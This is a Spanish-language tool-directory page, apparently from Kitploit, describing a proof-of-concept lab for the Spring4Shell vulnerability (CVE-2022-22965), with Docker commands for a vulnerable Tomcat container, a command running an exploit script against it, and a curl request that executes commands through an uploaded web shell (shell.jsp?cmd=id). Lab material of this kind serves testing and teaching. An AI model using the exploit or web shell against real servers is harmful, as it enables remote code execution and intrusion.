Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22965-Spring4Shell — PoC y exploit para CVE-2022-22965 Spring4Shell | Kitploit
Herramientas/GitHubGitHub/jakabakos/cve-2022-22965-spring4shell
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubjakabakos/cve-2022-22965-spring4shell

CVE-2022-22965-Spring4Shell

PoC y exploit para CVE-2022-22965 Spring4Shell

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
22hace 3 añosAún no revisado

Spring4Shell

Spring4Shell (CVE-2022-22965) Prueba de Concepto con un servidor Tomcat vulnerable y una aplicación spring4shell vulnerable.

Detalles sobre esta vulnerabilidad

  • https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
  • https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
  • https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

Cómo usar

Construir la imagen

root@kitploit:~
docker build . -t spring4shell

Ejecutar el contenedor

root@kitploit:~
docker run -p 80:8080 spring4shell

También puedes ejecutarlo con el puerto del depurador expuesto si es necesario:

root@kitploit:~
docker run -p 80:8080 –p 5005:5005 spring4shell

¡Consulta el artículo original del blog para obtener detalles sobre cómo configurar un depurador remoto en IntelliJ Idea!

Ejecutar el exploit

root@kitploit:~
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

Luego, puedes ejecutar cualquier comando de forma remota así:

root@kitploit:~
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...o visitando la URL anterior.

Descargar herramienta